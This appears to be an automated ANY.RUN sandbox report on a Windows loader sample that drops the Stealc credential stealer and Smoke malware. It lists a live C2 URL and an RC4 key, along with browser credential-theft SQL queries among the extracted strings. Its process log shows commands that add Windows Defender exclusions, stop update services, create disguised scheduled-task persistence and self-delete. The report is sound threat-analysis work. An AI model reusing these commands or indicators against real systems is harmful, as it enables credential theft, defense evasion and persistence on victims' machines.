analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe |
| Full analysis: | https://app.any.run/tasks/a4ec2383-1ceb-484b-9a62-8daad5377013 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 05, 2024 at 13:06:26 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows |
| MD5: | D8D52A95B809C586AFE1BBF5373EDFC4 |
| SHA1: | 4081F7D0211614DF482969BA5AF1F29E5AB2BEE7 |
| SHA256: | 629E031747E94B66F85F83711433A1C3D084AC0A57FBCC58F970BE04DE2D48CB |
| SSDEEP: | 98304:NOxI+diXhOFO76AwMG20rfwTmgXwZl9sdVCdqksQ18E+jOIjyN+VtmKNhBrqNTY4:fwUm2ikgoeSUaZm5dCa |
MALICIOUS
Creates a writable file in the system directory
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- powershell.exe (PID: 964)
Actions looks like stealing of personal data
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- nsgAD1D.tmp (PID: 2484)
Uses Task Scheduler to autorun other applications
- powershell.exe (PID: 972)
- powershell.exe (PID: 2104)
Runs injected code in another process
- toolspub2.exe (PID: 2452)
Steals credentials from Web Browsers
- nsgAD1D.tmp (PID: 2484)
STEALC has been detected (YARA)
- nsgAD1D.tmp (PID: 2484)
Starts CMD.EXE for self-deleting
- nsgAD1D.tmp (PID: 2484)
SUSPICIOUS
Reads settings of System Certificates
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
Reads the Internet Settings
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
- InstallSetup8.exe (PID: 2084)
- powershell.exe (PID: 760)
- nsgAD1D.tmp (PID: 2484)
Starts application with an unusual extension
- InstallSetup8.exe (PID: 2084)
Starts SC.EXE for service management
- cmd.exe (PID: 1036)
- cmd.exe (PID: 480)
Uses powercfg.exe to modify the power settings
- cmd.exe (PID: 2376)
- cmd.exe (PID: 1176)
Searches for installed software
- nsgAD1D.tmp (PID: 2484)
Checks Windows Trust Settings
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
Drops a system driver (possible attempt to evade defenses)
- updater.exe (PID: 2144)
Reads browser cookies
- nsgAD1D.tmp (PID: 2484)
Reads security settings of Internet Explorer
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
The process verifies whether the antivirus software is installed
- nsgAD1D.tmp (PID: 2484)
Starts CMD.EXE for commands execution
- nsgAD1D.tmp (PID: 2484)
Uses TIMEOUT.EXE to delay execution
- cmd.exe (PID: 2800)
INFO
Checks supported languages
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
- InstallSetup8.exe (PID: 2084)
- toolspub2.exe (PID: 288)
- e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
- obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
- BroomSetup.exe (PID: 2328)
- nsgAD1D.tmp (PID: 2484)
- updater.exe (PID: 2144)
- toolspub2.exe (PID: 2452)
Reads the computer name
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
- InstallSetup8.exe (PID: 2084)
- BroomSetup.exe (PID: 2328)
- e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
- nsgAD1D.tmp (PID: 2484)
Drops the executable file immediately after the start
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
- InstallSetup8.exe (PID: 2084)
- obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
- nsgAD1D.tmp (PID: 2484)
- updater.exe (PID: 2144)
- BroomSetup.exe (PID: 2328)
Reads the machine GUID from the registry
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
- e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
- nsgAD1D.tmp (PID: 2484)
Process checks computer location settings
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
Checks for external IP
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
PRIVATELOADER has been detected (SURICATA)
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
Connects to the CnC server
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- nsgAD1D.tmp (PID: 2484)
Connects to the server without a host name
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
- nsgAD1D.tmp (PID: 2484)
Checks proxy server information
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
- nsgAD1D.tmp (PID: 2484)
Creates files or folders in the user directory
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
- nsgAD1D.tmp (PID: 2484)
Process requests binary or script from the Internet
- 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- InstallSetup8.exe (PID: 2084)
- nsgAD1D.tmp (PID: 2484)
Create files in a temporary directory
- Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
- InstallSetup8.exe (PID: 2084)
Executes as Windows Service
- raserver.exe (PID: 2128)
Manual execution by a user
- powershell.exe (PID: 760)
- cmd.exe (PID: 1036)
- cmd.exe (PID: 2376)
- powershell.exe (PID: 972)
- schtasks.exe (PID: 1636)
- cmd.exe (PID: 480)
- powershell.exe (PID: 2104)
- cmd.exe (PID: 1176)
- conhost.exe (PID: 2304)
- explorer.exe (PID: 2580)
- powershell.exe (PID: 964)
Starts POWERSHELL.EXE for commands execution
- explorer.exe (PID: 2004)
Script adds exclusion path to Windows Defender
- explorer.exe (PID: 2004)
Adds path to the Windows Defender exclusion list
- explorer.exe (PID: 2004)
Starts CMD.EXE for commands execution
- explorer.exe (PID: 2004)
Creates files in the program directory
- obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
- nsgAD1D.tmp (PID: 2484)
- updater.exe (PID: 2144)
Uses Task Scheduler to run other applications
- explorer.exe (PID: 2004)
The process executes via Task Scheduler
- updater.exe (PID: 2144)
Application launched itself
- toolspub2.exe (PID: 288)
STEALC has been detected (SURICATA)
- nsgAD1D.tmp (PID: 2484)
Reads CPU info
- nsgAD1D.tmp (PID: 2484)
Reads product name
- nsgAD1D.tmp (PID: 2484)
Reads Environment values
- nsgAD1D.tmp (PID: 2484)
Application was injected by another process
- explorer.exe (PID: 2004)
Steals credentials
- nsgAD1D.tmp (PID: 2484)
Unusual connection from system programs
- powershell.exe (PID: 964)
The Powershell connects to the Internet
- powershell.exe (PID: 964)
The process drops Mozilla's DLL files
- nsgAD1D.tmp (PID: 2484)
Connects to unusual port
- explorer.exe (PID: 2580)
The process drops C-runtime libraries
- nsgAD1D.tmp (PID: 2484)
Process drops legitimate windows executable
- nsgAD1D.tmp (PID: 2484)
SMOKE has been detected (SURICATA)
- explorer.exe (PID: 2004)
Reads the Internet Settings
- explorer.exe (PID: 2004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Stealc
(PID) Process(2484) nsgAD1D.tmp
C2http://185.172.128.79/3886d2276f6914c4.php
Keys
RC42673782774813489983097231025
Strings (433)N|E/XOJt
wdqhEEW=*MC}
!l^8pIw
" & del "C:\ProgramData\*.dll"" & exit
#9R-R]Ty
#Y{,lV,rN&QMF
#z|uX<
%08lX%04lX%lu
%APPDATA%
%DESKTOP%
%DOCUMENTS%
%LOCALAPPDATA%
%RECENT%
%ROGRAMFILES%
%ROGRAMFILES_86%
%USERPROFILE%
%d/%d/%d %d:%d:%d
%hu/%hu/%hu
')Y$(|YiiCC>
')]Q^GhPtP
')c_UC$El2XQ
'GstbSzBI+C[s6CF
'Hg/zaiOu.}qL`
'qtAYw
(Q~,',4=Xq
(RE e#'V,IF
(qlE'N6KHo
)YFYZK
){.!lQQ|)7C
*(,QQXl
*.ini
*.lnk
*.tox
+f0UDMHa
+qxsz{PF\1y
,Cyo^|@Ft @
,uyHDLD0:
- Architecture:
- CPU:
- Computer Name:
- Cores:
- Country: ISO?
- Display Resolution:
- GPU:
- HWID:
- IP: IP?
- Keyboards:
- Language:
- Laptop:
- Local Time:
- OS:
- RAM:
- Running Path:
- Threads:
- UTC:
- UserName:
.exe
.txt
/'Jl,<R)K[H.
/3886d2276f6914c4.php
/78gYLGFX:y*sD\n
/U~c^jt2wT"
/c start
/c timeout /t 5 & del /f /q "
/f059ec3d7eb90876/
/wAP$/?M9/qz
00000001
00000002
00000003
00000004
0e|]_TT@
1cN]
3'rtL~BBxG
3WO]n/JIS4\z
49"N%Dr&T4GR<
4sr*YcbR6TS6O
5NyJx/dW@\xW]e}>d"Z
6d.f|Qx[Z-9
7(pb_E\@1F
7Itg.UqP
7r]}@ZFQG}W
7v?v&Ujz{
7|^2-_t1t/@
84yGM{$\_
9b*}OLVV;Xn
9dJ,SkIw
;'s~6[s
;8SmOLa
;RC;w5z_<
;i8m}(C]h<Tpy
;xF+?JTrW
?5gXCYhRtR@
?Lg*U|ZR_{u
?Y9{3(y>(2:RELP/
?{Q<L
@OH%fqg
A7FDF864FBC10B77*
A92DAA6EA6F891F2*
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
All Users:
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptDestroyKey
BCryptGenerteSymmetricKey
BCryptOpenAlgorithmProvider
BCryptSetProperty
BitBlt
C:\ProgramDta\
C:\ProgramDta\nss3.dll
C:\Windows\system32\cmd.exe
CURRENT
CharToOemW
CloseHandle
CloseWindow
CoCreateInstance
CoInitialize
CoUninitialize
Content-Disposition: form-data; name="
Content-Type: multipart/form-data; boundary=----
Cookies
CopyFileA
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateEventA
CreateFileA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
CryptBinaryToStringA
CryptStringToBinaryA
CryptUnprotectData
Current User:
D877F783D5D3EF8C*
DISPLAY
DeleteFileA
DeleteObject
DialogConfig.vdf
DialogConfigOverlay*.vdf
DisplayName
DisplayVersion
E-AQ{.}1[9
EnumDisplayDevicesA
ExitProcess
F8806DD0C461824F*
FALSE
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
Fx,K4qtP
GdipCreateBitmapFromHBITMAP
GdipDisposeImage
GdipFree
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipSaveImageToStream
GdiplusShutdown
GdiplusStartup
GetComputerNameA
GetCurrentProcess
GetCurrentProcessId
GetDC
GetDesktopWindow
GetDeviceCaps
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileSizeEx
GetHGlobalFromStream
GetKeyboardLayoutList
GetLastError
GetLocalTime
GetLocaleInfoA
GetLogicalProcessorInformationEx
GetModuleFileNameA
GetModuleFileNameExA
GetProcAddress
GetProcessHeap
GetSystemInfo
GetSystemPowerStatus
GetSystemTime
GetTimeZoneInformation
GetUserDefaultLangID
GetUserDefaultLocaleName
GetUserNameA
GetVolumeInformationA
GetWindowRect
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalLock
GlobalMemoryStatusEx
GlobalSize
H,<^[u0
H5cEO<Atl
HAL9TH
HARDWARE\DESCRIPTION\System\CentralProcessor\0
HTTP/1.1
HeapAlloc
HeapFree
History
HpSYh[F-H_
HttpOpenRequestA
HttpSendRequestA
HzUw{ED>
IcU>2AACDS
IndexedDB
Installed Apps:
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetOpenUrlA
InternetReadFile
IsWow64Process
Ism"Yw9)K
J$cqi)q
JohnDoe
JsFbQUw)CG
Ks~lr]QLmP
LoadLibraryA
Local Extension Settings
Local State
LocalAlloc
LocalFree
Login Data
MultiByteToWideChar
NSS_Init
NSS_Shutdown
Network
Network Info:
OLZuUO,I8
OpenEventA
OpenProcess
Opera
Opera GX Stble
Opera Stable
OperaGX
PATH
PK11SDR_Decrypt
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
POST
Password
PathMatchSpecA
Pidgin
Process List:
Process32First
Process32Next
ProcessorNameString
ProductName
ReadFile
RegCloseKey
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryValueExA
ReleaseDC
RmEndSession
RmGetList
RmRegisterResources
RmStartSession
SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-1164440800, name, encrypted_value from cookies
SELECT fieldname, value FROM moz_formhistory
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT name, value FROM autofill
SELECT name_on_card, expiration_month, expiration_year, cardnumber_encrypted FROM credit_cards
SELECT origin_url, username_value, password_value FROM logins
SELECT url FROM moz_places LIMIT 1000
SELECT url FROM urls LIMIT 1000
SHGetFolderPathA
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SSCu?C
SelectObject
SetEnvironmentVariableA
SetFilePointer
ShellExecuteExA
Sleep
Software\Microsoft\Office\1.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Valve\Steam
SteamPath
StrCmpCA
StrCmpCW
StrStrA
Sync Extension Settings
System Summry:
SystemTimeToFileTime
TRUE
Telegram
TerminateProcess
User Agents:
VMwareVMware
VirtualAlloc
VirtualAllocExNuma
VirtualProtect
Virtualree
Web Data
WideCharToMultiByte
WqRN|)K
WriteFile
ZtnFv,`86/*i\wf>5?*J|d
\.purple\
\Discord\tokens.txt
\Local Storge\leveldb
\Local Storge\leveldb\CURRENT
\Outlook\accounts.txt
\Steam\
\Telegram Desktop\
\Temp\
\config\
\discord\
\feQ
^[,YuC|rp1
_0.indexeddb.leveldb
_o{)Of#JL"*,],<vqW0AA[5c8e#xSf#>rLd]RNXw^qk+!;@f\[ER\LaE=Z;7Vu[m3BG_Wg3sq|=BvM[TW+-cqBJFvZ:R.k'=2JE`Jg25Ob'ctae~j
_vOkNXvuW][c}+-Sm%VuIF$$;MV4o3_yq/m:H=6GQ:?A^KFrb!>+k^0EV5S"sCHAf1f<:aGhzjT
accounts.xml
advapi32.dll
autofill
bcrypt.dll
browser:
browsers
build
card:
chrome
chrome-extension_
config.vdf
cookies
cookies.sqlite
crypt32.dll
dA!FZ9Rs
dQw4w9WgXcQ
default5
done
encryptedPassword
encryptedUsername
encrypted_key
fJ}@&CTx-K_{
file
file_name
files
firefox
formSubmitURL
formhistory.sqlite
freebl3.dll
g5w2dJEpq
gR>]^w
gdi32.dll
gdiplus.dll
guid
g{-J+Ml?
hI?eQ,ONK
history
http://185.172.128.79
https
hu`sB-N=P?
hwid
i4sB!RLO
key_datas
libraryfolders.vdf
login:
logins.json
loginusers.vdf
lstrcatA
lstrcpyA
lstrcpynA
lstrlenA
m/`chT,3G;
map*
message
month:
mozglue.dll
msvcp140.dll
name:
nss3.dll
ntdll.dll
oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
ole32.dll
open
opera
password:
places.sqlite
plugins
profile:
profiles.ini
psapi.dll
p}lBxW\29
rJT=cw
rdBdeCSDCLu
rgf0V\$,B"QX
rstrtmgr.dll
rtv0|j<V :"BLBU
runas
s_]y?@hX!A#w=EMLO=8hVodl4Vz@ lp87M=8L%[uem|tSSJ*=Zp\b+HV|zZI:|><T{5bf kZDZ2yqZLZOGG?O9Sf{>8jQ;n@&bM$W,eA3p@^SlZJeeC&Z"J)lb%vto%1
screenshot.jpg
shell32.dll
shlwapi.dll
soft
softokn3.dll
sqlite3.dll
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_text
sqlite3_finlize
sqlite3_open
sqlite3_prepare_v2
sqlite3_step
sscanf
ssfn*
system_info.txt
token
token:
url:
user32.dll
usernameField
vcruntime140.dll
wallets
wininet.dll
wsprintfA
wsprintfW
xLdLeUd:Js
xg~rCu(_@Ist
year:
{,iR?[L?<
{.E[H
}YhmwDa
TRiD
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2024:01:04 06:27:20+01:00 |
| ImageFileCharacteristics: | No relocs, Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.34 |
| CodeSize: | 1650688 |
| InitializedDataSize: | 482816 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x58d587 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.1.6 |
| ProductVersionNumber: | 1.0.1.6 |
| FileFlagsMask: | 0x003f |
| FileFlags: | Patched, Private build |
| FileOS: | Windows NT |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | German |
| CharacterSet: | Unicode |
| CompanyName: | DarkLab |
| FileDescription: | DarkLab |
| FileVersion: | 1.0.1.6 |
| InternalName: | DarkLab.exe |
| LegalCopyright: | Copyright (C) 2023 DarkLab |
| OriginalFileName: | DarkLab.exe |
| ProductName: | DarkLab |
| ProductVersion: | 1.0.1.6 |
Total processes
90
Monitored processes
46
Malicious processes
9
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 288 | "C:\Users\admin\AppData\Local\Temp\toolspub2.exe" | C:\Users\admin\AppData\Local\Temp\toolspub2.exe | — | Jmvp_d6dvInBM8B8O47ZK6Sv.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 328 | sc stop WaaSMedicSvc | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 480 | C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 1060 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 624 | "C:\Users\admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" | C:\Users\admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | — | Jmvp_d6dvInBM8B8O47ZK6Sv.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 760 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 852 | powercfg /x -hibernate-timeout-dc 0 | C:\Windows\System32\powercfg.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Power Settings Command-Line Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 896 | sc stop UsoSvc | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 964 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 972 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ygknjoglr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1036 | C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1060 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
10 508
Read events
10 330
Write events
161
Delete events
17
Modification events
| (PID) Process: | (2004) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB010000000425B8FBD140304D952DBE1156DB516600000000020000000000106600000001000020000000DB7CFDADD20035B54FE72E91B52C386E688080B10C096541937D15768230E9B4000000000E8000000002000020000000FC5BD8C24841EC802021354E72CCCB98F326B765B114F6B99237B0E53C70855230000000E5259FA42E3216E6ABD96FBA3A6491DBFE5EABB7874FD90C6180CAAA39FCB4DA5097AFD783F475C120AF35A7DAD783F44000000017650D25D4C3008FF427790B98E977F1147A37B555438BA5F03FADACC116CEA191D18AD610A15D4BB60F12EF1F1AF002B029515D03AC7340FF8EFA43530BF5CD | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}User |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions |
| Operation: | delete key | Name: | (default) |
Value: | |||
Executable files
25
Suspicious files
24
Text files
7
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3056 | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\tmvwr[1].bmp | — | |
MD5:— | SHA256:— | |||
| 3056 | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | C:\Users\admin\Documents\GuardFox\obpv7W2EtHKLDkr1kzO1X_In.exe | — | |
MD5:— | SHA256:— | |||
| 3056 | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | binary | |
MD5:CDFD60E717A44C2349B553E011958B85 | SHA256:0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F | |||
| 3056 | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | C:\Windows\System32\GroupPolicy\gpt.ini | text | |
MD5:39DFFC602ED934569F26BE44EC645814 | SHA256:B57A88E5B1ACF3A784BE88B87FA3EE1F0991CB7C1C66DA423F3595FFC6E0C5C2 | |||
| 972 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wncs5zei.no1.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 3056 | 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\NE1ALZ3Z.txt | text | |
MD5:37015019D1A0A13EF5FF22E36216662C | SHA256:19CFBB18044C76429B97299737AA2C42CAFB0162BF02164743047026ED7CA219 | |||
